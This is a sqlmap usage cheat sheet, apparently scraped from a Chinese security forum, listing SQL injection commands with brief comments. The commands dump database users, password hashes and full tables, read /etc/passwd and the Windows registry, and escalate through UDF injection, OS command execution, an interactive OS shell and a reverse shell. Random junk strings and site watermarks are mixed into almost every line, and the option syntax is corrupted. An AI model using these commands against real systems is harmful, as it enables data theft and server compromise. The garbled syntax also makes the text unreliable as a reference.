Sqlmap using Notes

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--current-user #获取当前用户名称
-Focus on cyber security-P, Z (q% {/O, j% |
Sqlmap-U "http://www.xxoo.com/news?id=1"--level=3--smart--dbms "Mysql"--current-db #获取当前数据库名称
-Focus on cyber security! j+ M9 \: U (v* o& G8 W
Sqlmap-U "http://www.xxoo.com/news?id=1"--level=3--smart--dbms "Mysql"--tables-d "Db_name" #列表名www.t00ls.net5 m:i) k + Z. G7 B8 x

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--columns-t "tablename" users-d "db_name"-V 0 #列字段
www.t00ls.net. I9], n:y; T5 k$ R
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--dump-c "column_name"-T "table_name"-D "db_name"-V 0 #获取字段内容-Focus on cyber security 9 t& f$? 7 P) c/s+ f3 Q
-low-key development, F8 S/i4 ~# R9 j% J

www.t00ls.net8 T2? * H. n! v! y2 [: F
Information Acquisition ******************

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--users #列数据库用户t00ls.net-Low profile for development-technology endless-Focus on Network Security, u$ O3 A-^ (M8 k ' b# k
-Focus on network security. A5 m:o: D7 \
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--dbs# column databasewww.t00ls.net4 D1 g& l ' r-h: B4 T8 B

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--passwords #数据库用户密码www.t00ls.net0 E! H. R "J1 u# D; S

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--passwords-u root-v 0 #列出指定用户数据库密码-Focus on cyber security $ {-J (~) S9 D3 J0 s

Sqlmap-U "http://url/news?id=1"--dbms "Mysql"--dump-c "Password,user,id"-T "tablename"-D "db_name"--start 1--stop 20 # List the specified fields, listing 20

t00ls.net-Low profile for development-technology endless-Focus on Network Security5?% D9 t# B (Q5]/~ w
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--dump-all-v 0 #列出所有数据库所有表9 e5 o8 Q8 ' 6 {q
t00ls& | x3 {9 z* a! \
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--privileges #查看权限
www.t00ls.net+ \2 D, ^2 n2 T, ^,-i
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--privileges-u root #查看指定用户权限& X (q ' H5 d! i6 T0 y:h+ ^6 z
-low-key development; b/@/Y0 O6 m$ S4 K. a-l
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--is-dba-v 1 #是否是数据库管理员-focus on cyber security + G! p& v2 E9 X; V. E:t0 L
: \& |* u; Q4 L
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--roles #枚举数据库用户角色www.t00ls.net ' ^+ w% O (O3 A: \: S/v2 t-o. I8 S
www.t00ls.net. L ' W4 n "P5 o# M, p
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--udf-inject #导入用户自定义函数 (Get system privileges!) ）t00ls+ F8 q$ F0 q; C1?: w/p

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--dump-all--exclude-sysdbs-v 0 #列出当前库所有表-Low profile development 7 R ' x4 L6 B0 @ ' I
-low-key development, A; s& W3 E6 \7 \
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--union-cols #union query table records
www.t00ls.net; Y! l% G0 u& G8 P4 v
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--cookie "Cookie_value" #cookie注入

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"-B #获取banner信息t00ls9 f+ W4 c& ^ ' x1 s# G8 * P8 l
www.t00ls.net (i "A (h-e9 '-\& h
Sqlmap-U "http://url/news?id=1"--data "id=3" #post注入
-Focus on cyber security * U8 R7 m& m "^, p* V1 Z
Sqlmap-U "http://url/news?id=1"--level=3--smart-v 1-f #指纹判别数据库类型
-Low-key development-V7 s! j! |5 w* o* q (f, l {
Sqlmap-U "http://url/news?id=1"--level=3--smart--proxy "http://127.0.0.1:8118" #代理注入t00ls.net-Low-key development-technology endless-Focus on Network Security l% K; q% S, K! b/a T. M

Sqlmap-U "http://url/news?id=1"--string "String_on_true_page" #指定关键词-Focus on cyber security "C ' ^ (i# F4}: J! D

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--sql-shell #执行指定sql命令"X/b2 H9 l* F; {g
t00ls, Z0 J ' y0 c:q: i+ X Q4 r0 W
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--file/etc/passwdwww.t00ls.net0 ~# g) x# p& \4 L6 P

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--os-cmd=whoami #执行系统命令

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--os-shell #系统交互shell-Low-key development 5 _) H5 _ (T4 D3 B0 C ' m
t00ls.net-Low profile for development-technology endless-Focus on Network Security5 y& D; C6 v% Q0 \) Q
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--os-pwn #反弹shell

Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--reg-read #读取win系统注册表-focus on cyber security | "_; q t; A * Z7 t& f* k$ E; T
-Low-key development: D6 K4 V8 r& r+ Y
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--dbs-o "Sqlmap. Log "#保存进度+ t$ V4 ~: u:a+ b
www.t00ls.net (y9 ' 0 J2 Z;?) w "_& E
Sqlmap-U "http://url/news?id=1"--level=3--smart--dbms "Mysql"--dbs-o "Sqlmap. Log "--resume #恢复已保存进度& E) I ' J-v ~! r+ h

Sqlmap using Notes